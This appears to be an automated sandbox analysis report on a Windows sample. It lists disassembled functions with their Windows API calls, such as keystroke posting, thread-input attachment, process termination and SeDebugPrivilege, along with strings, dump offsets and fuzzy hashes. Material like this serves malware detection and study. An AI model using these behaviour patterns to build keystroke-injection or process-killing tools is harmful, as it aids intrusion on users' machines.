                                                    • Instruction Fuzzy Hash: 0A318072501210BFEF118F54CC8AFEB3BAAEF4A765F044066FE099A291C6759D41CB74
                                                    Function 006B7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 006B7A6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: d3ca33e8420dd9a60a5d824c63ba5cdfd2a9c58559aaebac2e81eb84b2264de3
                                                    • Instruction ID: e0f346c95020dc56a4c48d2c912103bd6755639a999b2ceee7c978e31a16279b
                                                    • Opcode Fuzzy Hash: d3ca33e8420dd9a60a5d824c63ba5cdfd2a9c58559aaebac2e81eb84b2264de3
                                                    • Instruction Fuzzy Hash: 43B17FB19042199FDB50DFA4C885BFEBBF6EF89321F244429E901E7251D734E981CBA4
                                                    Function 006B11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 006B11F0
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B1204
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 006B120B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0268,?,00000001), ref: 006B121A
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006B122C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0268,?,00000001), ref: 006B1245
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0268,?,00000001), ref: 006B1257
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B129C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B12B1
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B12BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 11298b22fcea8ddeabbfc96cada0f9ca59f066df4f5691b96252c3ecc4cc62f6
                                                    • Instruction ID: 56a6bd954d50dd66e0d1b076b5f55d272c7dc7886b9d01ca00d5cfe29191da02
                                                    • Opcode Fuzzy Hash: 11298b22fcea8ddeabbfc96cada0f9ca59f066df4f5691b96252c3ecc4cc62f6
                                                    • Instruction Fuzzy Hash: 653193B5A01204BBDB10AF58EC54FEA77AFEB56311F51C125F901CA2A0D7749EC18B54
                                                    Function 0065FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0065FAA6
                                                    • OleUninitialize.OLE32(?,00000000), ref: 0065FB45
                                                    • UnregisterHotKey.USER32(?), ref: 0065FC9C
                                                    • DestroyWindow.USER32(?), ref: 006945D6
                                                    • FreeLibrary.KERNEL32(?), ref: 0069463B
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00694668
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: ba6f699e002975a6c5081e202afa15de6ce0680ecaa9318e485ed58369f061d7
                                                    • Instruction ID: 3f9efab67a8b5ce3b2e93f7191ac671a0e3703b5e82e1d267f75ab91e68011ae
                                                    • Opcode Fuzzy Hash: ba6f699e002975a6c5081e202afa15de6ce0680ecaa9318e485ed58369f061d7
                                                    • Instruction Fuzzy Hash: 8DA17D70702212CFDB58EF14C5A5EA9F36AAF05711F1442ADE80AAB661DF30AD17CF54
                                                    Function 006C9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: ,,n$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-2400968246
                                                    • Opcode ID: 792029ac5aa8737b35d818fb9cd3b9f71e0522a39f745c344bc5b3f793e03819
                                                    • Instruction ID: 4d0b05141b8ad81fe72b36191d2a8b486515e053c0d63da09aca2250b36e4352
                                                    • Opcode Fuzzy Hash: 792029ac5aa8737b35d818fb9cd3b9f71e0522a39f745c344bc5b3f793e03819
                                                    • Instruction Fuzzy Hash: 47919E71A00219EBDF24DFA5C848FEEB7BAEF45710F10815DF519AB280D7749945CBA0
                                                    Function 006AA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumChildWindows.USER32(?,006AA439), ref: 006AA377
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 8dfa1b676733b3b3790075119b460bcd012fab4ffec733ba4088e820277ab553
                                                    • Instruction ID: cc2df146eb625d019519a489e6c5775e2ad313860571dd3ed58d3dc53c58b6fd
                                                    • Opcode Fuzzy Hash: 8dfa1b676733b3b3790075119b460bcd012fab4ffec733ba4088e820277ab553
                                                    • Instruction Fuzzy Hash: 1F919630900605EADB48EFE0C442BEDFBB6BF06300F54811ED859A7291DB316E99DFA5
                                                    Function 006D6D80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006D6E24
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 006D6E38
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006D6E52
                                                    • _wcscat.LIBCMT ref: 006D6EAD
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 006D6EC4
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006D6EF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: @U=u$SysListView32
                                                    • API String ID: 307300125-1908207174
                                                    • Opcode ID: 01cf14927a513e299b97a0f965fdd93f116fe803a10d49e6d07fbbd9b2087853
                                                    • Instruction ID: 2b353e96ab0872a83f6495b12e63478b1263a7642be0746fe5c6e3732afdbb57
                                                    • Opcode Fuzzy Hash: 01cf14927a513e299b97a0f965fdd93f116fe803a10d49e6d07fbbd9b2087853
                                                    • Instruction Fuzzy Hash: 1141AE71E00349EBEB219F64CC85BEAB7EAEF08350F10452AF585E73D2D6719D848B64
                                                    Function 006C8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,006DF910), ref: 006C8D28
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006DF910), ref: 006C8D5C
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006C8ED6
                                                    • SysFreeString.OLEAUT32(?), ref: 006C8F00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: 67ef1be122c9347cce209925474319dc25372b7b7259df07bb70c21fedfc5562
                                                    • Instruction ID: edb75acad364ede8605ccb42cf7d07bae58a7edffe96eefe8f8fde2861b272da
                                                    • Opcode Fuzzy Hash: 67ef1be122c9347cce209925474319dc25372b7b7259df07bb70c21fedfc5562
                                                    • Instruction Fuzzy Hash: 0EF10771A00109AFCB14DF94C888EFEB7BAFF49315F14845CE905AB251DB31AE45CB61
                                                    Function 006CF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006CF6B5
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006CF848
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006CF86C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006CF8AC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006CF8CE
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006CFA4A
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006CFA7C
                                                    • CloseHandle.KERNEL32(?), ref: 006CFAAB
                                                    • CloseHandle.KERNEL32(?), ref: 006CFB22
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 9f689f3f8a643bbff56ae6cf5b4b327aecc30cef9db45d2d21b75ee783b463eb
                                                    • Instruction ID: 1c3641bf96bd00ee154c76263ecec33eefab44475572ed92e679011746b313e4
                                                    • Opcode Fuzzy Hash: 9f689f3f8a643bbff56ae6cf5b4b327aecc30cef9db45d2d21b75ee783b463eb
                                                    • Instruction Fuzzy Hash: 47E17E31604201DFCB54EF24D891B6ABBE3EF85314F14896DF8999B2A2CB31DC45CB66
                                                    Function 006B4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006B3697,?), ref: 006B468B
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006B3697,?), ref: 006B46A4
                                                      • Part of subcall function 006B4A31: GetFileAttributesW.KERNEL32(?,006B370B), ref: 006B4A32
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006B4D40
                                                    • _wcscmp.LIBCMT ref: 006B4D5A
                                                    • MoveFileW.KERNEL32(?,?), ref: 006B4D75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 844e85dc0d10e1683c8c12abe147b210a9a05e9d76d94a5d16a9cc350df1fa44
                                                    • Instruction ID: f09013fa552c93184e2e7a0ebf9ed56a424511cd4d6ed592f02e33ffb456a0bb
                                                    • Opcode Fuzzy Hash: 844e85dc0d10e1683c8c12abe147b210a9a05e9d76d94a5d16a9cc350df1fa44
                                                    • Instruction Fuzzy Hash: 295153F24083859BC764DBA0D8919DFB3EDAF84350F00492EF589D3152EF34A688C76A
                                                    Function 006A966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006AA84C
                                                      • Part of subcall function 006AA82C: GetCurrentThreadId.KERNEL32 ref: 006AA853
                                                      • Part of subcall function 006AA82C: AttachThreadInput.USER32(00000000,?,006A9683,?,00000001), ref: 006AA85A
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 006A968E
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006A96AB
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006A96AE
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 006A96B7
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006A96D5
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006A96D8
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 006A96E1
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006A96F8
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006A96FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 6874320ed011e4c696dab99cbb62f782ba7a840224f09a2891ef765bf7bff6a5
                                                    • Instruction ID: 9d9ea27e0055b331895f56efd97beeceaa4dea7f5b6b22f4c740aa213176011a
                                                    • Opcode Fuzzy Hash: 6874320ed011e4c696dab99cbb62f782ba7a840224f09a2891ef765bf7bff6a5
                                                    • Instruction Fuzzy Hash: 9F11E571D10218FEF7106F60DC49F6A3B1EDB4D750F20142AF245AB0A0C9F25C10DAA8
                                                    Function 006A8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006A853C,00000B00,?,?), ref: 006A892A
                                                    • HeapAlloc.KERNEL32(00000000,?,006A853C,00000B00,?,?), ref: 006A8931
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006A853C,00000B00,?,?), ref: 006A8946
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,006A853C,00000B00,?,?), ref: 006A894E
                                                    • DuplicateHandle.KERNEL32(00000000,?,006A853C,00000B00,?,?), ref: 006A8951
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006A853C,00000B00,?,?), ref: 006A8961
                                                    • GetCurrentProcess.KERNEL32(006A853C,00000000,?,006A853C,00000B00,?,?), ref: 006A8969
                                                    • DuplicateHandle.KERNEL32(00000000,?,006A853C,00000B00,?,?), ref: 006A896C
                                                    • CreateThread.KERNEL32(00000000,00000000,006A8992,00000000,00000000,00000000), ref: 006A8986
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 6c8c9ba78aa1675703d876a55757e6379a5575fa8de2580c476876c0589e95b2
                                                    • Instruction ID: 5f36299f17c22cb9dec82dd17884e90698ba8629bf38fa0486dd1542a5dfb9c7
                                                    • Opcode Fuzzy Hash: 6c8c9ba78aa1675703d876a55757e6379a5575fa8de2580c476876c0589e95b2
                                                    • Instruction Fuzzy Hash: CC01BBB5A41308FFE710ABA5DC4DF6B3BADEB89711F419421FA05DB1A1CA709D00CB60
                                                    Function 006C975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?,?,006A7455), ref: 006A7127
                                                      • Part of subcall function 006A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7142
                                                      • Part of subcall function 006A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7150
                                                      • Part of subcall function 006A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?), ref: 006A7160
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006C9806
                                                    • _memset.LIBCMT ref: 006C9813
                                                    • _memset.LIBCMT ref: 006C9956
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006C9982
                                                    • CoTaskMemFree.OLE32(?), ref: 006C998D
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 006C99DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: 5b6b18cc0537923c4697b0e4e4ad9776c9fb1ee74a7f0ac56e1f4833d2ea4aa6
                                                    • Instruction ID: 33982616098fcc890e55b2ff4abae8a6ca51ef5e75f30c6c21df76270c32e03b
                                                    • Opcode Fuzzy Hash: 5b6b18cc0537923c4697b0e4e4ad9776c9fb1ee74a7f0ac56e1f4833d2ea4aa6
                                                    • Instruction Fuzzy Hash: 25912971D00229EBDB10DFA5DC45EEEBBBAEF08710F10415AF419A7291DB719A44CFA1
                                                    Function 006CE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 006B3C7A
                                                      • Part of subcall function 006B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 006B3C88
                                                      • Part of subcall function 006B3C55: CloseHandle.KERNEL32(00000000), ref: 006B3D52
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006CE9A4
                                                    • GetLastError.KERNEL32 ref: 006CE9B7
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006CE9E6
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 006CEA63
                                                    • GetLastError.KERNEL32(00000000), ref: 006CEA6E
                                                    • CloseHandle.KERNEL32(00000000), ref: 006CEAA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: e4a7a86906a16f7f37c088ea2a90d65477a6dd6b0bbb7aeb0d1a0c19d8dee44b
                                                    • Instruction ID: 44f7a1714bbcc83df938475373bb4ca5b46b282d6c189bdb21883545cebf6296
                                                    • Opcode Fuzzy Hash: e4a7a86906a16f7f37c088ea2a90d65477a6dd6b0bbb7aeb0d1a0c19d8dee44b
                                                    • Instruction Fuzzy Hash: AB4174716002019FDB14EF64CC95FAABBA6AF45310F08845DF9069B2D2CB76A908CF99
                                                    Function 006DA056 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
